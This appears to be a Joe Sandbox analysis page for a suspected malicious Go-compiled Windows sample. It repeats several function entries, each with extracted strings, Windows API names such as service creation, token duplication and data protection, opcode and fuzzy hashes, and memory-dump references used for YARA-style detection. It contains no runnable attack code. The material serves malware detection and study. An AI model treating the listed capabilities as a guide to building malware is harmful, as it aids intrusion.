String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: 6dbe952b50d7edb5c87c4f45b126d2ce9a9d572249207969f877951d2d8d5581
Instruction ID: 323e4fbf46737869378826e19524dd1f325ef4e192873e4f3e1a0bea395dc29b
Opcode Fuzzy Hash: 6dbe952b50d7edb5c87c4f45b126d2ce9a9d572249207969f877951d2d8d5581
Instruction Fuzzy Hash: 16418032309F8491E724AB62E94179EBBA5F784BC0F48C532DA8D97B59DF78C855C340

Function 00A77058 Relevance: 7.6, Strings: 6, Instructions: 113COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: 33d4619e995652db9d64d63865838b2ff4d2729f73db8aba87ff116a8b72d590
Instruction ID: d8c9f1397a0c423de669e8a0db997466e18af2d9c3002d14f5d4af3a197e6523
Opcode Fuzzy Hash: 33d4619e995652db9d64d63865838b2ff4d2729f73db8aba87ff116a8b72d590
Instruction Fuzzy Hash: FB418032209F8491E724AB62E94179EBBA5F784BC0F48C532DA8D97B59DF78C855C340

Function 00A77088 Relevance: 7.6, Strings: 6, Instructions: 112COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: 30083bf242d96b0d682ce9bd53783122b9bf6239539a9323032cc91d55a3fe4c
Instruction ID: 1a1a3b2aee044a9d413dd2726dab6c990753af41b23cc4a685c57d5aae8e67ec
Opcode Fuzzy Hash: 30083bf242d96b0d682ce9bd53783122b9bf6239539a9323032cc91d55a3fe4c
Instruction Fuzzy Hash: 3B418E32309E8491E724AB62E94179EBBA5F784BC0F48C532DA8D97B69DF78C855C340

Function 00A770BF Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: 037d8655e47f37b389e739072ae0062125f9996593d47382d65ca2374f7f882f
Instruction ID: 18ffa2a7adbc3ca3bd5a682318cb58336d0b5c79d10af6df7b5ab0ea29aa2dc4
Opcode Fuzzy Hash: 037d8655e47f37b389e739072ae0062125f9996593d47382d65ca2374f7f882f
Instruction Fuzzy Hash: CB418032209E8491E720AB52E9417DEBBA5F784BC0F88C532DA8D97B69DF78C445C340

Function 00A770B9 Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: a1eb08105395094caf670e4704d8d0a7703656b48e7458fd2207e7571923e2e0
Instruction ID: 8eeef813554b9248e04de4459aee09ae1ee434c66fd851881270b48ea154d781
Opcode Fuzzy Hash: a1eb08105395094caf670e4704d8d0a7703656b48e7458fd2207e7571923e2e0
Instruction Fuzzy Hash: B0417032209E8491E724AB52E9417DEBBA5F784BC0F88C532DA8D97B69DF78C455C340

Function 00A770E3 Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: 0f10d1ee253fbea824d8d45ceda5a10fb0e1b3f8b10ea6815900c1519392f20f
Instruction ID: e9556f192f01bf77a48070c19e67b83cb1ce1408c3276add7216e0767d2708d7
Opcode Fuzzy Hash: 0f10d1ee253fbea824d8d45ceda5a10fb0e1b3f8b10ea6815900c1519392f20f
Instruction Fuzzy Hash: EF417E32209E8491E760AB62E94179EBBA5F784BC0F88C532DA8D97B69DF78C455C340

Function 00A770C5 Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

